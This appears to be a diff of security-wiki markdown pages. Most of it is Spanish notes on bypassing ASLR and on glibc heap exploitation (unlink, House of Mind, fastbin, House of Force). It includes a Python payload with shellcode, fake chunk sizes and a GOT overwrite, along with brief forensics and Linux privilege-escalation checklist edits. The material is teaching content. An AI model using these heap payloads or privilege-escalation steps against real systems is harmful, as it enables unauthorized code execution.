Codigo y datos iniciados y no iniciados: .text, .data y .bss —> 16bits de entropia en la variable delta_exec, esta variable se inicia aleatoriamente con cada proceso y se suma a las direcciones iniciales Codigo y datos iniciados y no iniciados: .text, .data y .bss —> 16bits de entropia en la variable delta\_exec, esta variable se inicia aleatoriamente con cada proceso y se suma a las direcciones iniciales
Memoria asignada por mmap() y libraries compartidas —> 16bits, delta_mmap Memoria asignada por mmap() y libraries compartidas —> 16bits, delta\_mmap
El stack —> 24bits, delta_stack —> Realmente 11 (del byte 10º al 20º inclusive) —>alineado a 16bytes —> 524.288 posibles direcciones reales del stack El stack —> 24bits, delta\_stack —> Realmente 11 (del byte 10º al 20º inclusive) —>alineado a 16bytes —> 524.288 posibles direcciones reales del stack
Las variables de entorno y los argumentos se desplazan menos que un buffer en el stack. Las variables de entorno y los argumentos se desplazan menos que un buffer en el stack.
@ -542,7 +542,7 @@ Es una técnica para convertir un buffer overflow en un error de cadena de forma
**Ataque a librerías** **Ataque a librerías**
Las librerías están en una posición con 16bits de aleatoriedad = 65636 posibles direcciones. Si un servidor vulnerable llama a fork() el espacio de direcciones de memoria es clocado en el proceso hijo y se mantiene intacto. Por lo que se puede intentar hacer un brute force a la función usleep() de libc pasándole como argumento “16” de forma que cuando tarde más de lo normal en responder se habrá encontrado dicha función. Sabiendo dónde está dicha función se puede obtener delta_mmap y calcular las demás. Las librerías están en una posición con 16bits de aleatoriedad = 65636 posibles direcciones. Si un servidor vulnerable llama a fork() el espacio de direcciones de memoria es clocado en el proceso hijo y se mantiene intacto. Por lo que se puede intentar hacer un brute force a la función usleep() de libc pasándole como argumento “16” de forma que cuando tarde más de lo normal en responder se habrá encontrado dicha función. Sabiendo dónde está dicha función se puede obtener delta\_mmap y calcular las demás.
La única forma de estar seguros de que el ASLR funciona es usando arquitectura de 64bits. Ahí no hay ataques de fuerza bruta. La única forma de estar seguros de que el ASLR funciona es usando arquitectura de 64bits. Ahí no hay ataques de fuerza bruta.
@ -679,9 +679,9 @@ Bind now —> Las direcciones de las funciones se buscan al cargar el programa y
A pesar de esto, en general los programas no están complicados con esas opciones luego estos ataques siguen siendo posibles. A pesar de esto, en general los programas no están complicados con esas opciones luego estos ataques siguen siendo posibles.
**readelf -l /proc/ID_PROC/exe | grep BIND_NOW** —> Para saber si usan el BIND NOW **readelf -l /proc/ID\_PROC/exe | grep BIND\_NOW** —> Para saber si usan el BIND NOW
#### **Fortify Source -D_FORTIFY_SOURCE=1 o =2** #### **Fortify Source -D\_FORTIFY\_SOURCE=1 o =2**
Trata de identificar las funciones que copian de un sitio a otro de forma insegura y cambiar la función por una función segura. Trata de identificar las funciones que copian de un sitio a otro de forma insegura y cambiar la función por una función segura.
@ -689,7 +689,7 @@ Por ej:\
char buf\[16];\ char buf\[16];\
strcpy(but, source); strcpy(but, source);
La identifica como insegura y entonces cambia strcpy() por \__strcpy_chk() utilizando el tamaño del buffer como tamaño máximo a copiar. La identifica como insegura y entonces cambia strcpy() por \_\_strcpy\_chk() utilizando el tamaño del buffer como tamaño máximo a copiar.
La diferencia entre **=1** o **=2** es que: La diferencia entre **=1** o **=2** es que:
@ -699,11 +699,11 @@ Para mostrar el mensaje de error se usa el argv\[0], por lo que si se pone en el
#### **Reemplazo de Libsafe** #### **Reemplazo de Libsafe**
Se activa con: LD_PRELOAD=/lib/libsafe.so.2\ Se activa con: LD\_PRELOAD=/lib/libsafe.so.2\
o\ o\
“/lib/libsave.so.2” > /etc/ld.so.preload “/lib/libsave.so.2” > /etc/ld.so.preload
Se interceptan las llamadas a algunas funciones inseguras por otras seguras. No está estandarizado. (solo para x86, no para compilaxiones con -fomit-frame-pointer, no compilaciones estaticas, no todas las funciones vulnerables se vuelven seguras y LD_PRELOAD no sirve en binarios con suid). Se interceptan las llamadas a algunas funciones inseguras por otras seguras. No está estandarizado. (solo para x86, no para compilaxiones con -fomit-frame-pointer, no compilaciones estaticas, no todas las funciones vulnerables se vuelven seguras y LD\_PRELOAD no sirve en binarios con suid).
#### **ASCII Armored Address Space** #### **ASCII Armored Address Space**
@ -734,13 +734,13 @@ Insure++
**Trozo asignado** **Trozo asignado**
prev_size |\ prev\_size |\
size | —Cabecera\ size | —Cabecera\
\*mem | Datos \*mem | Datos
**Trozo libre** **Trozo libre**
prev_size |\ prev\_size |\
size |\ size |\
\*fd | Ptr forward chunk\ \*fd | Ptr forward chunk\
\*bk | Ptr back chunk —Cabecera\ \*bk | Ptr back chunk —Cabecera\
@ -762,20 +762,20 @@ BK->fd = FD; —> El FD del anterior chunk apunta al nuevo chunk\
Por lo tanto si conseguimos modificar el P->bk con la dirección de un shellcode y el P->fd con la dirección a una entrada en la GOT o DTORS menos 12 se logra: Por lo tanto si conseguimos modificar el P->bk con la dirección de un shellcode y el P->fd con la dirección a una entrada en la GOT o DTORS menos 12 se logra:
BK = P->bk = \&shellcode\ BK = P->bk = \&shellcode\
FD = P->fd = &\__dtor_end\_\_ - 12\ FD = P->fd = &\_\_dtor\_end\_\_ - 12\
FD->bk = BK -> \*((&\__dtor_end\_\_ - 12) + 12) = \&shellcode FD->bk = BK -> \*((&\_\_dtor\_end\_\_ - 12) + 12) = \&shellcode
Y así se se ejecuta al salir del programa la shellcode. Y así se se ejecuta al salir del programa la shellcode.
Además, la 4º sentencia de unlink() escribe algo y la shellcode tiene que estar reparada para esto: Además, la 4º sentencia de unlink() escribe algo y la shellcode tiene que estar reparada para esto:
BK->fd = FD -> \*(\&shellcode + 8) = (&\__dtor_end\_\_ - 12) —> Esto provoca la escritura de 4 bytes a partir del 8º byte de la shellcode, por lo que la primera instrucción de la shellcode debe ser un jmp para saltar esto y caer en unos nops que lleven al resto de la shellcode. BK->fd = FD -> \*(\&shellcode + 8) = (&\_\_dtor\_end\_\_ - 12) —> Esto provoca la escritura de 4 bytes a partir del 8º byte de la shellcode, por lo que la primera instrucción de la shellcode debe ser un jmp para saltar esto y caer en unos nops que lleven al resto de la shellcode.
Por lo tanto el exploit se crea: Por lo tanto el exploit se crea:
En el buffer1 metemos la shellcode comenzando por un jmp para que caiga en los nops o en el resto de la shellcode. En el buffer1 metemos la shellcode comenzando por un jmp para que caiga en los nops o en el resto de la shellcode.
Después de la shell code metemos relleno hasta llegar al campo prev_size y size del siguiente trozo. En estos sitios metemos 0xfffffff0 (de forma que se sobrescrita el prev_size para que tenga el bit que dice que está libre) y “-4“(0xfffffffc) en el size (para que cuando compruebe en el 3º trozo si el 2º estaba libre en realidad vaya al prev_size modificado que le dirá que s´está libre) -> Así cuando free() investigue irá al size del 3º pero en realidad irá al 2º - 4 y pensará que el 2º trozo está libre. Y entonces llamará a **unlink()**. Después de la shell code metemos relleno hasta llegar al campo prev\_size y size del siguiente trozo. En estos sitios metemos 0xfffffff0 (de forma que se sobrescrita el prev\_size para que tenga el bit que dice que está libre) y “-4“(0xfffffffc) en el size (para que cuando compruebe en el 3º trozo si el 2º estaba libre en realidad vaya al prev\_size modificado que le dirá que s´está libre) -> Así cuando free() investigue irá al size del 3º pero en realidad irá al 2º - 4 y pensará que el 2º trozo está libre. Y entonces llamará a **unlink()**.
Al llamar a unlink() usará como P->fd los primeros datos del 2º trozo por lo que ahí se meterá la dirección que se quieres sobreescribir - 12(pues en FD->bk le sumará 12 a la dirección guardada en FD) . Y en esa dirección introducirá la segunda dirección que encuentre en el 2º trozo, que nos interesará que sea la dirección a la shellcode(P->bk falso). Al llamar a unlink() usará como P->fd los primeros datos del 2º trozo por lo que ahí se meterá la dirección que se quieres sobreescribir - 12(pues en FD->bk le sumará 12 a la dirección guardada en FD) . Y en esa dirección introducirá la segunda dirección que encuentre en el 2º trozo, que nos interesará que sea la dirección a la shellcode(P->bk falso).
@ -791,17 +791,17 @@ Al llamar a unlink() usará como P->fd los primeros datos del 2º trozo por lo q
**"\x80\xe8\xdc\xff\xff\xff/bin/sh";** **"\x80\xe8\xdc\xff\xff\xff/bin/sh";**
**prev_size = pack("\<I”, 0xfffffff0) #Interesa que el bit que indica que el anterior trozo está libre esté a 1** **prev\_size = pack("\<I”, 0xfffffff0) #Interesa que el bit que indica que el anterior trozo está libre esté a 1**
**fake_size = pack("\<I”, 0xfffffffc) #-4, para que piense que el “size” del 3º trozo está 4bytes detrás (apunta a prev_size) pues es ahí donde mira si el 2º trozo está libre** **fake\_size = pack("\<I”, 0xfffffffc) #-4, para que piense que el “size” del 3º trozo está 4bytes detrás (apunta a prev\_size) pues es ahí donde mira si el 2º trozo está libre**
**addr_sc = pack("\<I", 0x0804a008 + 8) #En el payload al principio le vamos a poner 8bytes de relleno** **addr\_sc = pack("\<I", 0x0804a008 + 8) #En el payload al principio le vamos a poner 8bytes de relleno**
**got_free = pack("\<I", 0x08048300 - 12) #Dirección de free() en la plt-12 (será la dirección que se sobrescrita para que se lanza la shellcode la 2º vez que se llame a free)** **got\_free = pack("\<I", 0x08048300 - 12) #Dirección de free() en la plt-12 (será la dirección que se sobrescrita para que se lanza la shellcode la 2º vez que se llame a free)**
**payload = "aaaabbbb" + shellcode + "b"\*(512-len(shellcode)-8) # Como se dijo el payload comienza con 8 bytes de relleno porque sí** **payload = "aaaabbbb" + shellcode + "b"\*(512-len(shellcode)-8) # Como se dijo el payload comienza con 8 bytes de relleno porque sí**
**payload += prev_size + fake_size + got_free + addr_sc #Se modifica el 2º trozo, el got_free apunta a donde vamos a guardar la direccion addr_sc + 12** **payload += prev\_size + fake\_size + got\_free + addr\_sc #Se modifica el 2º trozo, el got\_free apunta a donde vamos a guardar la direccion addr\_sc + 12**
**os.system("./8.3.o " + payload)** **os.system("./8.3.o " + payload)**
@ -813,11 +813,11 @@ En ese caso:
En el chunck c se pone el shellcode En el chunck c se pone el shellcode
El chunck a lo usamos para sobreescribir el b de forma que el el size tenga el bit PREV_INUSE desactivado de forma que piense que el chunck a está libre. El chunck a lo usamos para sobreescribir el b de forma que el el size tenga el bit PREV\_INUSE desactivado de forma que piense que el chunck a está libre.
Además, se sobreescribe en la cabecera b el size para que valga -4. Además, se sobreescribe en la cabecera b el size para que valga -4.
Entonces, el programa se pensará que “a” está libre y en un bin, por lo que llamará a unlink() para desenlazarlo. Sin embargo, como la cabecera PREV_SIZE vale -4. Se pensará que el trozo de “a” realmente empieza en b+4. Es decir, hará un unlink() a un trozo que comienza en b+4, por lo que en b+12 estará el puntero “fd” y en b+16 estará el puntero “bk”. Entonces, el programa se pensará que “a” está libre y en un bin, por lo que llamará a unlink() para desenlazarlo. Sin embargo, como la cabecera PREV\_SIZE vale -4. Se pensará que el trozo de “a” realmente empieza en b+4. Es decir, hará un unlink() a un trozo que comienza en b+4, por lo que en b+12 estará el puntero “fd” y en b+16 estará el puntero “bk”.
De esta forma, si en bk ponemos la dirección a la shellcode y en fd ponemos la dirección a la función “puts()”-12 tenemos nuestro payload. De esta forma, si en bk ponemos la dirección a la shellcode y en fd ponemos la dirección a la función “puts()”-12 tenemos nuestro payload.
@ -835,7 +835,7 @@ Un buffer contiguo a este que debe ser liberado y al que se le modificará el ca
Un buffer a liberar con un tamaño mayor a 512 pero menor que el buffer anterior Un buffer a liberar con un tamaño mayor a 512 pero menor que el buffer anterior
Un buffer declarado antes del paso 3 que permita sobreescribir el prev_size de este Un buffer declarado antes del paso 3 que permita sobreescribir el prev\_size de este
De esta forma logrando sobres cribar en dos mallocs de forma descontrolada y en uno de forma controlada pero que solo se libera ese uno, podemos hacer un exploit. De esta forma logrando sobres cribar en dos mallocs de forma descontrolada y en uno de forma controlada pero que solo se libera ese uno, podemos hacer un exploit.
@ -857,9 +857,9 @@ Las técnicas de Unlink() y FrontLink() fueron eliminadas al modificar la funci
Solo una llamada a free() es necesaria para provocar la ejecución de código arbitrario. Interesa buscar un segundo trozo que puede ser desbordado por uno anterior y liberado. Solo una llamada a free() es necesaria para provocar la ejecución de código arbitrario. Interesa buscar un segundo trozo que puede ser desbordado por uno anterior y liberado.
Una llamada a free() provoca llamar a public_fREe(mem), este hace: Una llamada a free() provoca llamar a public\_fREe(mem), este hace:
mstate ar_ptr; mstate ar\_ptr;
mchunkptr p; mchunkptr p;
@ -869,22 +869,22 @@ p = mem2chunk(mes); —> Devuelve un puntero a la dirección donde comienza el t
ar_ptr = arena_for_chunk(p); —> chunk_non_main_arena(ptr)?heap_for_ptr(ptr)->ar_ptr:\&main_arena \[1] ar\_ptr = arena\_for\_chunk(p); —> chunk\_non\_main\_arena(ptr)?heap\_for\_ptr(ptr)->ar\_ptr:\&main\_arena \[1]
\_int_free(ar_ptr, mem); \_int\_free(ar\_ptr, mem);
} }
En \[1] comprueba el campo size el bit NON_MAIN_ARENA, el cual se puede alterar para que la comprobación devuelva true y ejecute heap_for_ptr() que hace un and a “mem” dejando a 0 los 2.5 bytes menos importantes (en nuestro caso de 0x0804a000 deja 0x08000000) y accede a 0x08000000->ar_ptr (como si fuese un struct heap_info) En \[1] comprueba el campo size el bit NON\_MAIN\_ARENA, el cual se puede alterar para que la comprobación devuelva true y ejecute heap\_for\_ptr() que hace un and a “mem” dejando a 0 los 2.5 bytes menos importantes (en nuestro caso de 0x0804a000 deja 0x08000000) y accede a 0x08000000->ar\_ptr (como si fuese un struct heap\_info)
De esta forma si podemos controlar un trozo por ejemplo en 0x0804a000 y se va a liberar un trozo en **0x081002a0** podemos llegar a la dirección 0x08100000 y escribir lo que queramos, por ejemplo **0x0804a000**. Cuando este segundo trozo se libere se encontrará que heap_for_ptr(ptr)->ar_ptr devuelve lo que hemos escrito en 0x08100000 (pues se aplica a 0x081002a0 el and que vimos antes y de ahí se saca el valor de los 4 primeros bytes, el ar_ptr) De esta forma si podemos controlar un trozo por ejemplo en 0x0804a000 y se va a liberar un trozo en **0x081002a0** podemos llegar a la dirección 0x08100000 y escribir lo que queramos, por ejemplo **0x0804a000**. Cuando este segundo trozo se libere se encontrará que heap\_for\_ptr(ptr)->ar\_ptr devuelve lo que hemos escrito en 0x08100000 (pues se aplica a 0x081002a0 el and que vimos antes y de ahí se saca el valor de los 4 primeros bytes, el ar\_ptr)
De esta forma se llama a \_int_free(ar_ptr, mem), es decir, **\_int_free(0x0804a000, 0x081002a0)**\ De esta forma se llama a \_int\_free(ar\_ptr, mem), es decir, **\_int\_free(0x0804a000, 0x081002a0)**\
**\_int_free(mstate av, Void_t\* mem){**\ **\_int\_free(mstate av, Void\_t\* mem){**\
…\ …\
bck = unsorted_chunks(av);\ bck = unsorted\_chunks(av);\
fwd = bck->fd;\ fwd = bck->fd;\
p->bk = bck;\ p->bk = bck;\
p->fd = fwd;\ p->fd = fwd;\
@ -895,22 +895,22 @@ fwd->bk = p;
Como hemos visto antes podemos controlar el valor de av, pues es lo que escribimos en el trozo que se va a liberar. Como hemos visto antes podemos controlar el valor de av, pues es lo que escribimos en el trozo que se va a liberar.
Tal y como se define unsorted_chunks, sabemos que:\ Tal y como se define unsorted\_chunks, sabemos que:\
bck = \&av->bins\[2]-8;\ bck = \&av->bins\[2]-8;\
fwd = bck->fd = \*(av->bins\[2]);\ fwd = bck->fd = \*(av->bins\[2]);\
fwd->bk = \*(av->bins\[2] + 12) = p; fwd->bk = \*(av->bins\[2] + 12) = p;
Por lo tanto si en av->bins\[2] escribimos el valor de \__DTOR_END\_\_-12 en la última instrucción se escribirá en \__DTOR_END\_\_ la dirección del segundo trozo. Por lo tanto si en av->bins\[2] escribimos el valor de \_\_DTOR\_END\_\_-12 en la última instrucción se escribirá en \_\_DTOR\_END\_\_ la dirección del segundo trozo.
Es decir, en el primer trozo tenemos que poner al inicio muchas veces la dirección de \__DTOR_END\_\_-12 porque de ahí la sacará av->bins\[2] Es decir, en el primer trozo tenemos que poner al inicio muchas veces la dirección de \_\_DTOR\_END\_\_-12 porque de ahí la sacará av->bins\[2]
En la dirección que caiga la dirección del segundo trozo con los últimos 5 ceros hay que escribir la dirección a este primer trozo para que heap_for_ptr() piense que el ar_ptr está al inicio del primer trozo y saque de ahí el av->bins\[2] En la dirección que caiga la dirección del segundo trozo con los últimos 5 ceros hay que escribir la dirección a este primer trozo para que heap\_for\_ptr() piense que el ar\_ptr está al inicio del primer trozo y saque de ahí el av->bins\[2]
En el segundo trozo y gracias al primero sobreescribimos el prev_size con un jump 0x0c y el size con algo para activar -> NON_MAIN_ARENA En el segundo trozo y gracias al primero sobreescribimos el prev\_size con un jump 0x0c y el size con algo para activar -> NON\_MAIN\_ARENA
A continuación en el trozo 2 ponemos un montón de nops y finalmente la shellcode A continuación en el trozo 2 ponemos un montón de nops y finalmente la shellcode
De esta forma se llamará a \_int_free(TROZO1, TROZO2) y seguirá las instrucciones para escribir en \__DTOR_END\_\_ la dirección del prev_size del TROZO2 el cual saltará a la shellcode. De esta forma se llamará a \_int\_free(TROZO1, TROZO2) y seguirá las instrucciones para escribir en \_\_DTOR\_END\_\_ la dirección del prev\_size del TROZO2 el cual saltará a la shellcode.
Para aplicar esta técnica hace falta que se cumplan algunos requerimientos más que complican un poco más el payload. Para aplicar esta técnica hace falta que se cumplan algunos requerimientos más que complican un poco más el payload.
@ -920,9 +920,9 @@ Esta técnica ya no es aplicable pues se aplicó casi el mismo parche que para u
Es una variante de The house of mind Es una variante de The house of mind
nos interesa llegar a ejecutar el siguiente código al cuál se llega pasada la primera comprobación de la función \_int_free() nos interesa llegar a ejecutar el siguiente código al cuál se llega pasada la primera comprobación de la función \_int\_free()
fb = &(av->fastbins\[fastbin_index(size)] —> Siendo fastbin_index(sz) —> (sz >> 3) - 2 fb = &(av->fastbins\[fastbin\_index(size)] —> Siendo fastbin\_index(sz) —> (sz >> 3) - 2
@ -930,33 +930,33 @@ p->fd = \*fb
\*fb = p \*fb = p
De esta forma si se pone en “fb” da dirección de una función en la GOT, en esta dirección se pondrá la dirección al trozo sobrescrito. Para esto será necesario que la arena esté cerca de las direcciones de dtors. Más exactamente que av->max_fast esté en la dirección que vamos a sobreescribir. De esta forma si se pone en “fb” da dirección de una función en la GOT, en esta dirección se pondrá la dirección al trozo sobrescrito. Para esto será necesario que la arena esté cerca de las direcciones de dtors. Más exactamente que av->max\_fast esté en la dirección que vamos a sobreescribir.
Dado que con The House of Mind se vio que nosotros controlábamos la posición del av. Dado que con The House of Mind se vio que nosotros controlábamos la posición del av.
Entones si en el campo size ponemos un tamaño de 8 + NON_MAIN_ARENA + PREV_INUSE —> fastbin_index() nos devolverá fastbins\[-1], que apuntará a av->max_fast Entones si en el campo size ponemos un tamaño de 8 + NON\_MAIN\_ARENA + PREV\_INUSE —> fastbin\_index() nos devolverá fastbins\[-1], que apuntará a av->max\_fast
En este caso av->max_fast será la dirección que se sobrescrita (no a la que apunte, sino esa posición será la que se sobrescrita). En este caso av->max\_fast será la dirección que se sobrescrita (no a la que apunte, sino esa posición será la que se sobrescrita).
Además se tiene que cumplir que el trozo contiguo al liberado debe ser mayor que 8 -> Dado que hemos dicho que el size del trozo liberado es 8, en este trozo falso solo tenemos que poner un size mayor que 8 (como además la shellcode irá en el trozo liberado, habrá que poner al ppio un jmp que caiga en nops). Además se tiene que cumplir que el trozo contiguo al liberado debe ser mayor que 8 -> Dado que hemos dicho que el size del trozo liberado es 8, en este trozo falso solo tenemos que poner un size mayor que 8 (como además la shellcode irá en el trozo liberado, habrá que poner al ppio un jmp que caiga en nops).
Además, ese mismo trozo falso debe ser menor que av->system_mem. av->system_mem se encuentra 1848 bytes más allá. Además, ese mismo trozo falso debe ser menor que av->system\_mem. av->system\_mem se encuentra 1848 bytes más allá.
Por culpa de los nulos de \_DTOR_END\_ y de las pocas direcciones en la GOT, ninguna dirección de estas secciones sirven para ser sobrescritas, así que veamos como aplicar fastbin para atacar la pila. Por culpa de los nulos de \_DTOR\_END\_ y de las pocas direcciones en la GOT, ninguna dirección de estas secciones sirven para ser sobrescritas, así que veamos como aplicar fastbin para atacar la pila.
Otra forma de ataque es redirigir el **av** hacia la pila. Otra forma de ataque es redirigir el **av** hacia la pila.
Si modificamos el size para que de 16 en vez de 8 entonces: fastbin_index() nos devolverá fastbins\[0] y podemos hacer uso de esto para sobreescribir la pila. Si modificamos el size para que de 16 en vez de 8 entonces: fastbin\_index() nos devolverá fastbins\[0] y podemos hacer uso de esto para sobreescribir la pila.
Para esto no debe haber ningún canary ni valores raros en la pila, de hecho tenemos que encontrarnos en esta: 4bytes nulos + EBP + RET Para esto no debe haber ningún canary ni valores raros en la pila, de hecho tenemos que encontrarnos en esta: 4bytes nulos + EBP + RET
Los 4 bytes nulo se necesitan que el **av** estará a esta dirección y el primero elemento de un **av** es el mutexe que tiene que valer 0. Los 4 bytes nulo se necesitan que el **av** estará a esta dirección y el primero elemento de un **av** es el mutexe que tiene que valer 0.
El **av->max_fast** será el EBP y será un valor que nos servirá para saltarnos las restricciones. El **av->max\_fast** será el EBP y será un valor que nos servirá para saltarnos las restricciones.
En el **av->fastbins\[0]** se sobreescribirá con la dirección de **p** y será el RET, así se saltará a la shellcode. En el **av->fastbins\[0]** se sobreescribirá con la dirección de **p** y será el RET, así se saltará a la shellcode.
Además, en **av->system_mem** (1484bytes por encima de la posición en la pila) habrá bastante basura que nos permitirá saltarnos la comprobación que se realiza. Además, en **av->system\_mem** (1484bytes por encima de la posición en la pila) habrá bastante basura que nos permitirá saltarnos la comprobación que se realiza.
Además se tiene que cumplir que el trozo contiguo al liberado debe ser mayor que 8 -> Dado que hemos dicho que el size del trozo liberado es 16, en este trozo falso solo tenemos que poner un size mayor que 8 (como además la shellcode irá en el trozo liberado, habrá que poner al ppio un jmp que caiga en nops que van después del campo size del nuevo trozo falso). Además se tiene que cumplir que el trozo contiguo al liberado debe ser mayor que 8 -> Dado que hemos dicho que el size del trozo liberado es 16, en este trozo falso solo tenemos que poner un size mayor que 8 (como además la shellcode irá en el trozo liberado, habrá que poner al ppio un jmp que caiga en nops que van después del campo size del nuevo trozo falso).
@ -964,9 +964,9 @@ Además se tiene que cumplir que el trozo contiguo al liberado debe ser mayor qu
En este caso buscamos tener un puntero a un malloc que pueda ser alterable por el atacante (por ej, que el puntero esté en el stack debajo de un posible overflow a una variable). En este caso buscamos tener un puntero a un malloc que pueda ser alterable por el atacante (por ej, que el puntero esté en el stack debajo de un posible overflow a una variable).
Así, podríamos hacer que este puntero apuntase a donde fuese. Sin embargo, no cualquier sitio es válido, el tamaño del trozo falseado debe ser menor que av->max_fast y más específicamente igual al tamaño solicitado en una futura llamada a malloc()+8. Por ello, si sabemos que después de este puntero vulnerable se llama a malloc(40), el tamaño del trozo falso debe ser igual a 48. Así, podríamos hacer que este puntero apuntase a donde fuese. Sin embargo, no cualquier sitio es válido, el tamaño del trozo falseado debe ser menor que av->max\_fast y más específicamente igual al tamaño solicitado en una futura llamada a malloc()+8. Por ello, si sabemos que después de este puntero vulnerable se llama a malloc(40), el tamaño del trozo falso debe ser igual a 48.
Si por ejemplo el programa preguntase al usuario por un número podríamos introducir 48 y apuntar el puntero de malloc modificable a los siguientes 4bytes (que podrían pertenecer al EBP con suerte, así el 48 queda por detrás, como si fuese la cabecera size). Además, la dirección ptr-4+48 debe cumplir varias condiciones (siendo en este caso ptr=EBP), es decir, 8 < ptr-4+48 < av->system_mem. Si por ejemplo el programa preguntase al usuario por un número podríamos introducir 48 y apuntar el puntero de malloc modificable a los siguientes 4bytes (que podrían pertenecer al EBP con suerte, así el 48 queda por detrás, como si fuese la cabecera size). Además, la dirección ptr-4+48 debe cumplir varias condiciones (siendo en este caso ptr=EBP), es decir, 8 < ptr-4+48 < av->system\_mem.
En caso de que esto se cumpla, cuando se llame al siguiente malloc que dijimos que era malloc(40) se le asignará como dirección la dirección del EBP. En caso de que el atacante también pueda controlar lo que se escribe en este malloc puede sobreescribir tanto el EBP como el EIP con la dirección que quiera. En caso de que esto se cumpla, cuando se llame al siguiente malloc que dijimos que era malloc(40) se le asignará como dirección la dirección del EBP. En caso de que el atacante también pueda controlar lo que se escribe en este malloc puede sobreescribir tanto el EBP como el EIP con la dirección que quiera.
@ -980,7 +980,7 @@ Es necesario:
* Una llamada a malloc() con el tamaño definido por el usuario * Una llamada a malloc() con el tamaño definido por el usuario
* Una llamada a malloc() cuyos datos puedan ser definidos por el usuario * Una llamada a malloc() cuyos datos puedan ser definidos por el usuario
Lo primero que se hace es sobreescribir el size del trozo wilderness con un valor muy grande (0xffffffff), así cual quiera solicitud de memoria lo suficientemente grande será tratada en \_int_malloc() sin necesidad de expandir el heap Lo primero que se hace es sobreescribir el size del trozo wilderness con un valor muy grande (0xffffffff), así cual quiera solicitud de memoria lo suficientemente grande será tratada en \_int\_malloc() sin necesidad de expandir el heap
Lo segundo es alterar el av->top para que apunte a una zona de memoria bajo el control del atacante, como el stack. En av->top se pondrá \&EIP - 8. Lo segundo es alterar el av->top para que apunte a una zona de memoria bajo el control del atacante, como el stack. En av->top se pondrá \&EIP - 8.
@ -988,7 +988,7 @@ Tenemos que sobreescrbir av->top para que apunte a la zona de memoria bajo el co
victim = av->top; victim = av->top;
remainder = chunck_at_offset(victim, nb); remainder = chunck\_at\_offset(victim, nb);
av->top = remainder; av->top = remainder;
@ -1006,7 +1006,7 @@ Es importante saber que el size del nuevo trozo wilderness sea más grande que l
Los trozos liberados se introducen en el bin en función de su tamaño. Pero antes de introduciros se guardan en unsorted bins. Un trozo es liberado no se mete inmediatamente en su bin sino que se queda en unsorted bins. A continuación, si se reserva un nuevo trozo y el anterior liberado le puede servir se lo devuelve, pero si se reserva más grande, el trozo liberado en unsorted bins se mete en su bin adecuado. Los trozos liberados se introducen en el bin en función de su tamaño. Pero antes de introduciros se guardan en unsorted bins. Un trozo es liberado no se mete inmediatamente en su bin sino que se queda en unsorted bins. A continuación, si se reserva un nuevo trozo y el anterior liberado le puede servir se lo devuelve, pero si se reserva más grande, el trozo liberado en unsorted bins se mete en su bin adecuado.
Para alcanzar el código vulnerable la solicitud de memora deberá ser mayor a av->max_fast (72normalmente) y menos a MIN_LARGE_SIZE (512). Para alcanzar el código vulnerable la solicitud de memora deberá ser mayor a av->max\_fast (72normalmente) y menos a MIN\_LARGE\_SIZE (512).
Si en los bin hay un trozo del tamaño adecuado a lo que se pide se devuelve ese después de desenlazarlo: Si en los bin hay un trozo del tamaño adecuado a lo que se pide se devuelve ese después de desenlazarlo:
@ -1072,4 +1072,4 @@ Consiste en mediante reservas y liberaciones sementar la memoria de forma que qu
## **References** ## **References**
* \*\*\*\*[**https://guyinatuxedo.github.io/7.2-mitigation_relro/index.html**](https://guyinatuxedo.github.io/7.2-mitigation_relro/index.html)\*\*\*\* * \*\*\*\*[**https://guyinatuxedo.github.io/7.2-mitigation\_relro/index.html**](https://guyinatuxedo.github.io/7.2-mitigation\_relro/index.html)\*\*\*\*


@ -47,7 +47,7 @@ From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Sig
In order to mount a MBR in Linux you first need to get the start offset (you can use `fdisk` and the the `p` command) In order to mount a MBR in Linux you first need to get the start offset (you can use `fdisk` and the the `p` command)
![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (3).png>) ![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (2) (2).png>)
An then use the following code An then use the following code
@ -212,7 +212,7 @@ Also, the OS usually saves a lot of information about file system changes and ba
Note that this technique **doesn't work to retrieve fragmented files**. If a file **isn't stored in contiguous sectors**, then this technique won't be able to find it or at least part of it. Note that this technique **doesn't work to retrieve fragmented files**. If a file **isn't stored in contiguous sectors**, then this technique won't be able to find it or at least part of it.
There are several tools that you can use for file Carving indicating them the file-types you want search for&#x20; There are several tools that you can use for file Carving indicating them the file-types you want search for
{% content-ref url="file-data-carving-recovery-tools.md" %} {% content-ref url="file-data-carving-recovery-tools.md" %}
[file-data-carving-recovery-tools.md](file-data-carving-recovery-tools.md) [file-data-carving-recovery-tools.md](file-data-carving-recovery-tools.md)


@ -134,7 +134,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi
Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`). Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`).
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (3).png>) ![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (2) (2).png>)
### USB Detective ### USB Detective


@ -31,7 +31,7 @@ If you want to **share some tricks with the community** you can also submit **pu
* [ ] **Any unmounted drive?** * [ ] **Any unmounted drive?**
* [ ] **Any creds in fstab?** * [ ] **Any creds in fstab?**
### ****[**Installed Software**](privilege-escalation/#installed-software)**** ### [**Installed Software**](privilege-escalation/#installed-software)
* [ ] **Check for**[ **useful software**](privilege-escalation/#useful-software) **installed** * [ ] **Check for**[ **useful software**](privilege-escalation/#useful-software) **installed**
* [ ] **Check for** [**vulnerable software**](privilege-escalation/#vulnerable-software-installed) **installed** * [ ] **Check for** [**vulnerable software**](privilege-escalation/#vulnerable-software-installed) **installed**
@ -98,7 +98,7 @@ If you want to **share some tricks with the community** you can also submit **pu
* [ ] Are [**sudo** commands **limited** by **path**? can you **bypass** the restrictions](privilege-escalation/#sudo-execution-bypassing-paths)? * [ ] Are [**sudo** commands **limited** by **path**? can you **bypass** the restrictions](privilege-escalation/#sudo-execution-bypassing-paths)?
* [ ] [**Sudo/SUID binary without path indicated**](privilege-escalation/#sudo-command-suid-binary-without-command-path)? * [ ] [**Sudo/SUID binary without path indicated**](privilege-escalation/#sudo-command-suid-binary-without-command-path)?
* [ ] [**SUID binary specifying path**](privilege-escalation/#suid-binary-with-command-path)? Bypass * [ ] [**SUID binary specifying path**](privilege-escalation/#suid-binary-with-command-path)? Bypass
